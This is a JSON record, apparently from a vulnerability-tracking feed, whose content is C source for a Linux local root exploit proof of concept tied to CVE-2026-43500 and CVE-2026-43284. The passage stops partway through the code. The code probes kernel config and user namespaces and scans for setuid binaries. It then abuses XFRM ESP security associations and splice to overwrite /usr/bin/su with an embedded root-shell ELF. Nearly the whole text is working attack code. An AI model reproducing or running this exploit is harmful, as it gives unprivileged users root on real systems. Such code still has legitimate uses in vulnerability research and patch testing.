{"uuid": "a33a231b-aea3-4d29-9f58-276e517078f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/spynika/9c98aca892e18aff2b87d04aa69cc7d7", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef UDP_ENCAP\n#define UDP_ENCAP 100\n#endif\n#ifndef UDP_ENCAP_ESPINUDP\n#define UDP_ENCAP_ESPINUDP 2\n#endif\n#ifndef SOL_UDP\n#define SOL_UDP 17\n#endif\n\n#define ENC_PORT       4500\n#define SEQ_VAL        200\n#define REPLAY_SEQ     100\n#define PATCH_OFFSET   0\n#define PAYLOAD_LEN    192\n#define ENTRY_OFFSET   0x78\n#define TOTAL_SAS      (PAYLOAD_LEN / 4)\n#define SPI_BASE       0xDEADBE10u\n\nstatic const char *g_target = \"/usr/bin/su\";\nstatic unsigned char g_backup[PAYLOAD_LEN];\nstatic int g_have_backup = 0;\n\nstatic int g_tty = 0;\nstatic int g_verbose = 0;\nstatic int g_setuid_count = 0;\nstatic int g_exploitable_count = 0;\n\n/* first instructions of embedded shell ELF at file offset 0x78 */\nstatic const uint8_t su_marker[8] = {\n\t0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,\n};\n\n#define C_RST  \"\\033[0m\"\n#define C_DIM  \"\\033[2m\"\n#define C_RED  \"\\033[31m\"\n#define C_GRN  \"\\033[32m\"\n#define C_YEL  \"\\033[33m\"\n#define C_BLU  \"\\033[34m\"\n#define C_MAG  \"\\033[35m\"\n#define C_CYN  \"\\033[36m\"\n#define C_WHT  \"\\033[1;37m\"\n#define C_BOLD \"\\033[1m\"\n\n#define C(x) (g_tty ? (x) : \"\")\n\nstatic void print_banner(void)\n{\n\tprintf(\"\\n\");\n\tprintf(\"%s\", C(C_CYN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  SLEY - CVE-2026-43284 dirtyfrag PoC  \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n}\n\nstatic void status_line(const char *label, int ok, const char *detail)\n{\n\tprintf(\"  %s[%s]%s %-22s\",\n\t       C(C_DIM), ok ? \"+\" : \"-\", C(C_RST), label);\n\tif (detail && detail[0])\n\t\tprintf(\" %s%s%s\", ok ? C(C_GRN) : C(C_RED), detail, C(C_RST));\n\tprintf(\"\\n\");\n}\n\nstatic void phase_header(int n, const char *title)\n{\n\tprintf(\"%s\u250c\u2500[%s phase %d%s] %s%s\\n\",\n\t       C(C_CYN), C(C_MAG), n, C(C_CYN), title, C(C_RST));\n}\n\nstatic int cfg_value_ok(const char *val, const char *expect)\n{\n\tif (!val || !*val)\n\t\treturn 0;\n\tif (strcmp(expect, \"ym\") == 0)\n\t\treturn val[0] == 'y' || val[0] == 'm';\n\treturn strcmp(val, expect) == 0;\n}\n\nstruct kconfig_req {\n\tconst char *key;\n\tconst char *expect;\n\tconst char *hint;\n\tchar val[32];\n\tint found;\n};\n\nstatic void scan_kconfig(FILE *f, struct kconfig_req *req, size_t nreq)\n{\n\tchar line[256];\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\treq[i].val[0] = '\\0';\n\t\treq[i].found = 0;\n\t}\n\n\twhile (fgets(line, sizeof(line), f)) {\n\t\tfor (size_t i = 0; i < nreq; i++) {\n\t\t\tif (req[i].found)\n\t\t\t\tcontinue;\n\t\t\tsize_t klen = strlen(req[i].key);\n\t\t\tif (strncmp(line, req[i].key, klen) != 0 || line[klen] != '=')\n\t\t\t\tcontinue;\n\t\t\tconst char *v = line + klen + 1;\n\t\t\tsize_t n = strcspn(v, \"\\n\\r\");\n\t\t\tif (n >= sizeof(req[i].val))\n\t\t\t\tn = sizeof(req[i].val) - 1;\n\t\t\tmemcpy(req[i].val, v, n);\n\t\t\treq[i].val[n] = '\\0';\n\t\t\treq[i].found = 1;\n\t\t}\n\t}\n}\n\nstatic FILE *open_kconfig_gz(const char *src, int *via_popen)\n{\n\tstatic const char *cmds[] = {\n\t\t\"gzip -dc '%s' 2>/dev/null\",\n\t\t\"zcat '%s' 2>/dev/null\",\n\t\tNULL,\n\t};\n\tchar cmd[256];\n\n\tfor (int i = 0; cmds[i]; i++) {\n\t\tsnprintf(cmd, sizeof(cmd), cmds[i], src);\n\t\tFILE *f = popen(cmd, \"r\");\n\t\tif (f) {\n\t\t\t*via_popen = 1;\n\t\t\treturn f;\n\t\t}\n\t}\n\treturn NULL;\n}\n\nstatic FILE *open_kconfig_source(const char *release, char *label, size_t labellen,\n\t\t\t\t int *via_popen)\n{\n\tchar path[512];\n\tFILE *f;\n\n\t*via_popen = 0;\n\n\tsnprintf(path, sizeof(path), \"/boot/config-%s\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/build/.config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tif (access(\"/proc/config.gz\", R_OK) == 0) {\n\t\tf = open_kconfig_gz(\"/proc/config.gz\", via_popen);\n\t\tif (f) {\n\t\t\tsnprintf(label, labellen, \"/proc/config.gz\");\n\t\t\treturn f;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic void close_kconfig(FILE *f, int via_popen)\n{\n\tif (!f)\n\t\treturn;\n\tif (via_popen)\n\t\tpclose(f);\n\telse\n\t\tfclose(f);\n}\n\nstatic int check_kernel_config(void)\n{\n\tstruct utsname uts;\n\tchar cfglabel[512];\n\tint via_popen = 0;\n\n\tif (uname(&uts) < 0) {\n\t\tstatus_line(\"uname\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tphase_header(1, \"kernel config preflight\");\n\n\tFILE *cfg = open_kconfig_source(uts.release, cfglabel, sizeof(cfglabel), &via_popen);\n\tif (!cfg) {\n\t\tstatus_line(\"config file\", 0, \"not found under /boot, /lib/modules, /proc\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] WSL2: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] or: grep -E \\\"...\\\" /boot/config-%s%s\\n\\n\",\n\t\t        C(C_YEL), uts.release, C(C_RST));\n\t\treturn -1;\n\t}\n\n\tprintf(\"  %s\u2192%s %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_BLU), cfglabel, C(C_RST));\n\tstatus_line(\"config file\", 1, via_popen ? \"via gzip/zcat\" : \"plain text\");\n\n\tstruct kconfig_req req[] = {\n\t\t{ \"CONFIG_USER_NS\",  \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_XFRM\",     \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_INET_ESP\", \"ym\", \"required =m or =y\" },\n\t};\n\tsize_t nreq = sizeof(req) / sizeof(req[0]);\n\tint ok_all = 1;\n\n\tscan_kconfig(cfg, req, nreq);\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\tint ok = req[i].found && cfg_value_ok(req[i].val, req[i].expect);\n\t\tchar detail[128];\n\t\tif (req[i].found)\n\t\t\tsnprintf(detail, sizeof(detail), \"= %s  (%s)\", req[i].val, req[i].hint);\n\t\telse\n\t\t\tsnprintf(detail, sizeof(detail), \"missing (%s)\", req[i].hint);\n\t\tstatus_line(req[i].key, ok, detail);\n\t\tif (!ok)\n\t\t\tok_all = 0;\n\t}\n\n\tclose_kconfig(cfg, via_popen);\n\n\tprintf(\"\\n\");\n\tif (!ok_all) {\n\t\tfprintf(stderr, \"%s  [!] kernel does not meet exploit requirements.%s\\n\", C(C_RED), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] manual check: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"%s  kernel options OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic void print_sysctl_val(const char *path, const char *name)\n{\n\tFILE *f = fopen(path, \"r\");\n\tif (!f)\n\t\treturn;\n\tchar val[64];\n\tif (!fgets(val, sizeof(val), f)) {\n\t\tfclose(f);\n\t\treturn;\n\t}\n\tval[strcspn(val, \"\\n\\r\")] = '\\0';\n\tprintf(\"      %s%s%s = %s\\n\", C(C_DIM), name, C(C_RST), val);\n\tfclose(f);\n}\n\nstatic int check_userns_runtime(void)\n{\n\tphase_header(2, \"user namespace runtime check\");\n\tprintf(\"  %s\u2192%s unshare(CLONE_NEWUSER | CLONE_NEWNET)%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tif (getuid() == 0) {\n\t\tstatus_line(\"privilege\", 0, \"running as root \u2014 use an unprivileged user for LPE\");\n\t\tfprintf(stderr, \"\\n%s  [!] Exploit is meant to run as a normal user (uid != 0).%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tstatus_line(\"fork\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0)\n\t\t\t_exit(1);\n\t\t_exit(0);\n\t}\n\n\tint st;\n\tif (waitpid(pid, &st, 0) < 0) {\n\t\tstatus_line(\"waitpid\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint ok = WIFEXITED(st) && WEXITSTATUS(st) == 0;\n\tif (!ok) {\n\t\tstatus_line(\"unshare\", 0, \"Operation not permitted\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] CONFIG_USER_NS=y in /boot/config does not guarantee unprivileged userns at runtime.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This host blocks user namespaces (common on hardened Ubuntu 22.04+ / enterprise VMs).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] Changing the setuid target (su/sudo/pkexec) will not help \u2014 unshare must succeed first.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tprintf(\"\\n  %sRelevant sysctls on this host:%s\\n\", C(C_DIM), C(C_RST));\n\t\tprint_sysctl_val(\"/proc/sys/kernel/apparmor_restrict_unprivileged_userns\",\n\t\t\t\t \"kernel.apparmor_restrict_unprivileged_userns\");\n\t\tprint_sysctl_val(\"/proc/sys/kernel/unprivileged_userns_clone\",\n\t\t\t\t \"kernel.unprivileged_userns_clone\");\n\t\tprint_sysctl_val(\"/proc/sys/user/max_user_namespaces\",\n\t\t\t\t \"user.max_user_namespaces\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] Lab only (as root): sysctl -w kernel.apparmor_restrict_unprivileged_userns=0%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] Without userns: this PoC cannot run (see CVE-2026-43500 rxrpc variant).%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tstatus_line(\"unshare\", 1, \"user+net namespace available\");\n\tprintf(\"%s  runtime userns check OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic int skip_tree(const char *path)\n{\n\treturn strcmp(path, \"/proc\") == 0 ||\n\t       strcmp(path, \"/sys\") == 0 ||\n\t       strcmp(path, \"/dev\") == 0 ||\n\t       strcmp(path, \"/run\") == 0;\n}\n\nstatic int target_is_exploitable(const char *path)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0 || !S_ISREG(st.st_mode))\n\t\treturn 0;\n\tif (!(st.st_mode & S_ISUID))\n\t\treturn 0;\n\tif (access(path, R_OK | X_OK) != 0)\n\t\treturn 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tclose(fd);\n\treturn 1;\n}\n\nstatic int probe_target(const char *path, char *why, size_t whylen)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0) {\n\t\tsnprintf(why, whylen, \"missing (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!S_ISREG(st.st_mode)) {\n\t\tsnprintf(why, whylen, \"not a regular file\");\n\t\treturn -1;\n\t}\n\tif (!(st.st_mode & S_ISUID)) {\n\t\tsnprintf(why, whylen, \"no setuid bit (mode %04o)\", st.st_mode & 07777);\n\t\treturn -1;\n\t}\n\tif (access(path, R_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not readable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (access(path, X_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not executable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) {\n\t\tsnprintf(why, whylen, \"open(O_RDONLY) denied (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tclose(fd);\n\twhy[0] = '\\0';\n\treturn 0;\n}\n\nstatic int setuid_walk(const char *path, const struct stat *st, int flag,\n\t\t       struct FTW *ftw)\n{\n\t(void)ftw;\n\tif (flag == FTW_D && skip_tree(path))\n\t\treturn FTW_SKIP_SUBTREE;\n\n\tif (flag != FTW_F)\n\t\treturn 0;\n\n\tif (!S_ISREG(st->st_mode))\n\t\treturn 0;\n\tif (!(st->st_mode & S_ISUID))\n\t\treturn 0;\n\n\tg_setuid_count++;\n\tint exploitable = target_is_exploitable(path);\n\tif (exploitable)\n\t\tg_exploitable_count++;\n\n\tint is_target = (strcmp(path, g_target) == 0);\n\tconst char *color = exploitable ? C(C_GRN) : C(C_YEL);\n\tconst char *badge = exploitable ? \"[+]\" : \"[~]\";\n\n\tprintf(\"  %s%02d%s %s%s%s %s%s%s%s\\n\",\n\t       C(C_DIM), g_setuid_count, C(C_RST),\n\t       color, badge, C(C_RST), path,\n\t       is_target ? \"  \u2190 target\" : \"\",\n\t       exploitable ? \"\" : \"  (visible, not usable)\",\n\t       C(C_RST));\n\treturn 0;\n}\n\nstatic int scan_setuid_binaries(void)\n{\n\tphase_header(3, \"setuid binary scan\");\n\tprintf(\"  %s\u2192%s find / -perm -4000 -type f 2>/dev/null%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tg_setuid_count = 0;\n\tg_exploitable_count = 0;\n\tint rc = nftw(\"/\", setuid_walk, 32, FTW_PHYS | FTW_MOUNT);\n\n\tprintf(\"\\n\");\n\tif (rc != 0 && rc != EACCES) {\n\t\tstatus_line(\"nftw\", 0, strerror(rc > 0 ? rc : errno));\n\t}\n\tif (g_setuid_count == 0) {\n\t\tstatus_line(\"setuid\", 0, \"no SUID binaries found\");\n\t\treturn -1;\n\t}\n\tprintf(\"%s  found %d setuid binaries, %d exploitable (readable + openable).%s\\n\",\n\t       g_exploitable_count ? C(C_GRN) : C(C_YEL),\n\t       g_setuid_count, g_exploitable_count, C(C_RST));\n\tif (g_exploitable_count == 0) {\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] SUID files are visible but not readable \u2014 typical on shared hosting (CageFS/cPanel).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This exploit must open the target for read (splice). No usable target on this account.%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"\\n\");\n\treturn 0;\n}\n\n// minimal x86_64 root-shell ELF, entry=0x400078\n// setgid(0); setuid(0); execve(\"/bin/sh\", NULL, [\"TERM=xterm\",NULL]) \nstatic const unsigned char shell_elf[PAYLOAD_LEN] = {\n\t0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,\n\t0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,\n\t0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,\n\t0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,\n\t0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n};\n\nstatic int save_original(const char *path)\n{\n\tif (g_have_backup) return 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = read(fd, g_backup, PAYLOAD_LEN);\n\tclose(fd);\n\tif (n != PAYLOAD_LEN) return -1;\n\tg_have_backup = 1;\n\treturn 0;\n}\n\nstatic int setup_userns_netns(void)\n{\n\tuid_t ruid = getuid();\n\tgid_t rgid = getgid();\n\n\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {\n\t\tfprintf(stderr, \"unshare: %s\\n\", strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint fd = open(\"/proc/self/setgroups\", O_WRONLY);\n\tif (fd >= 0) { write(fd, \"deny\\n\", 5); close(fd); }\n\n\tchar buf[128];\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", ruid);\n\tfd = open(\"/proc/self/uid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", rgid);\n\tfd = open(\"/proc/self/gid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tint s = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (s >= 0) {\n\t\tstruct ifreq ifr;\n\t\tmemset(&ifr, 0, sizeof(ifr));\n\t\tstrncpy(ifr.ifr_name, \"lo\", IFNAMSIZ - 1);\n\t\tif (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {\n\t\t\tifr.ifr_flags |= IFF_UP | IFF_RUNNING;\n\t\t\tioctl(s, SIOCSIFFLAGS, &ifr);\n\t\t}\n\t\tclose(s);\n\t}\n\treturn 0;\n}\n\nstatic void nl_put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)\n{\n\tstruct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));\n\trta->rta_type = type;\n\trta->rta_len  = RTA_LENGTH(len);\n\tmemcpy(RTA_DATA(rta), data, len);\n\tnlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);\n}\n\nstatic int add_xfrm_sa(uint32_t spi, uint32_t patch_val)\n{\n\tint sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n\tif (sk < 0) return -1;\n\n\tstruct sockaddr_nl nl = { .nl_family = AF_NETLINK };\n\tif (bind(sk, (struct sockaddr *)&nl, sizeof(nl)) < 0) { close(sk); return -1; }\n\n\tchar buf[4096];\n\tmemset(buf, 0, sizeof(buf));\n\tstruct nlmsghdr *nlh = (struct nlmsghdr *)buf;\n\tnlh->nlmsg_type  = XFRM_MSG_NEWSA;\n\tnlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\n\tnlh->nlmsg_pid   = getpid();\n\tnlh->nlmsg_seq   = 1;\n\tnlh->nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));\n\n\tstruct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);\n\txs->id.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->id.spi      = htonl(spi);\n\txs->id.proto    = IPPROTO_ESP;\n\txs->saddr.a4    = inet_addr(\"127.0.0.1\");\n\txs->family      = AF_INET;\n\txs->mode          = XFRM_MODE_TRANSPORT;\n\txs->replay_window = 0;\n\txs->reqid         = 0x1234;\n\txs->flags         = XFRM_STATE_ESN;\n\txs->lft.soft_byte_limit   = (uint64_t)-1;\n\txs->lft.hard_byte_limit   = (uint64_t)-1;\n\txs->lft.soft_packet_limit = (uint64_t)-1;\n\txs->lft.hard_packet_limit = (uint64_t)-1;\n\txs->sel.family  = AF_INET;\n\txs->sel.prefixlen_d = 32;\n\txs->sel.prefixlen_s = 32;\n\txs->sel.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->sel.saddr.a4 = inet_addr(\"127.0.0.1\");\n\n\tchar auth_buf[sizeof(struct xfrm_algo_auth) + 32];\n\tmemset(auth_buf, 0, sizeof(auth_buf));\n\tstruct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)auth_buf;\n\tstrncpy(aa->alg_name, \"hmac(sha256)\", sizeof(aa->alg_name) - 1);\n\taa->alg_key_len   = 32 * 8;\n\taa->alg_trunc_len = 128;\n\tmemset(aa->alg_key, 0xAA, 32);\n\tnl_put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, auth_buf, sizeof(auth_buf));\n\n\tchar ciph_buf[sizeof(struct xfrm_algo) + 16];\n\tmemset(ciph_buf, 0, sizeof(ciph_buf));\n\tstruct xfrm_algo *ea = (struct xfrm_algo *)ciph_buf;\n\tstrncpy(ea->alg_name, \"cbc(aes)\", sizeof(ea->alg_name) - 1);\n\tea->alg_key_len = 16 * 8;\n\tmemset(ea->alg_key, 0xBB, 16);\n\tnl_put_attr(nlh, XFRMA_ALG_CRYPT, ciph_buf, sizeof(ciph_buf));\n\n\tstruct xfrm_encap_tmpl enc;\n\tmemset(&enc, 0, sizeof(enc));\n\tenc.encap_type  = UDP_ENCAP_ESPINUDP;\n\tenc.encap_sport = htons(ENC_PORT);\n\tenc.encap_dport = htons(ENC_PORT);\n\tnl_put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));\n\n\tstruct xfrm_replay_state_esn esn;\n\tmemset(&esn, 0, sizeof(esn));\n\tesn.bmp_len       = 1;\n\tesn.oseq          = 0;\n\tesn.seq           = REPLAY_SEQ;\n\tesn.oseq_hi       = 0;\n\tesn.seq_hi        = patch_val;\n\tesn.replay_window = 32;\n\tnl_put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &esn, sizeof(esn) + 4);\n\n\tif (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }\n\n\tchar rbuf[4096];\n\tint n = recv(sk, rbuf, sizeof(rbuf), 0);\n\tclose(sk);\n\tif (n < 0) return -1;\n\n\tstruct nlmsghdr *rh = (struct nlmsghdr *)rbuf;\n\tif (rh->nlmsg_type == NLMSG_ERROR) {\n\t\tstruct nlmsgerr *e = NLMSG_DATA(rh);\n\t\tif (e->error) return -1;\n\t}\n\treturn 0;\n}\n\nstatic int do_one_write(const char *path, off_t offset, uint32_t spi)\n{\n\tint sk_recv = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_recv < 0) return -1;\n\n\tint one = 1;\n\tsetsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));\n\n\tstruct sockaddr_in sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sin_family = AF_INET;\n\tsa.sin_port   = htons(ENC_PORT);\n\tsa.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tif (bind(sk_recv, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_recv); return -1; }\n\n\tint encap = UDP_ENCAP_ESPINUDP;\n\tif (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { close(sk_recv); return -1; }\n\n\tint sk_send = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_send < 0) { close(sk_recv); return -1; }\n\tif (connect(sk_send, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint file_fd = open(path, O_RDONLY);\n\tif (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint pfd[2];\n\tif (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }\n\n\tunsigned char hdr[24];\n\t*(uint32_t *)(hdr + 0) = htonl(spi);\n\t*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);\n\tmemset(hdr + 8, 0xCC, 16);\n\n\tstruct iovec iov = { .iov_base = hdr, .iov_len = sizeof(hdr) };\n\tif (vmsplice(pfd[1], &iov, 1, 0) != (ssize_t)sizeof(hdr))\n\t\tgoto fail;\n\n\toff_t off = offset;\n\tif (splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16)\n\t\tgoto fail;\n\n\tssize_t s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);\n\tusleep(150 * 1000);\n\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn (s == 40) ? 0 : -1;\n\nfail:\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn -1;\n}\n\n/* corrupt stage error codes (child maps to exit 11..13) */\n#define CORRUPT_ERR_UNSHARE 1\n#define CORRUPT_ERR_XFRM    2\n#define CORRUPT_ERR_WRITE   3\n\nstatic int corrupt_su(void)\n{\n\tif (setup_userns_netns() < 0)\n\t\treturn CORRUPT_ERR_UNSHARE;\n\tusleep(100 * 1000);\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\tuint32_t val =\n\t\t\t((uint32_t)shell_elf[i * 4 + 0] << 24) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 1] << 16) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 2] <<  8) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 3]);\n\t\tif (add_xfrm_sa(spi, val) < 0)\n\t\t\treturn CORRUPT_ERR_XFRM;\n\t}\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\toff_t off = PATCH_OFFSET + (off_t)i * 4;\n\t\tif (do_one_write(g_target, off, spi) < 0)\n\t\t\treturn CORRUPT_ERR_WRITE;\n\t}\n\treturn 0;\n}\n\nstatic const char *corrupt_err_msg(int code)\n{\n\tswitch (code) {\n\tcase CORRUPT_ERR_UNSHARE: return \"unshare / uid_map / lo setup failed in child\";\n\tcase CORRUPT_ERR_XFRM:    return \"XFRM SA registration failed (netlink denied?)\";\n\tcase CORRUPT_ERR_WRITE:   return \"splice/UDP 4500 write failed\";\n\tdefault:                  return \"unknown corrupt error\";\n\t}\n}\n\nstatic int target_already_patched(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tuint8_t got[8];\n\tssize_t n = pread(fd, got, sizeof(got), ENTRY_OFFSET);\n\tclose(fd);\n\tif (n != (ssize_t)sizeof(got))\n\t\treturn 0;\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0;\n}\n\nstatic int verify_patch(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn -1;\n\tuint8_t got[8];\n\tif (pread(fd, got, sizeof(got), ENTRY_OFFSET) != (ssize_t)sizeof(got)) {\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n\tclose(fd);\n\treturn memcmp(got, su_marker, 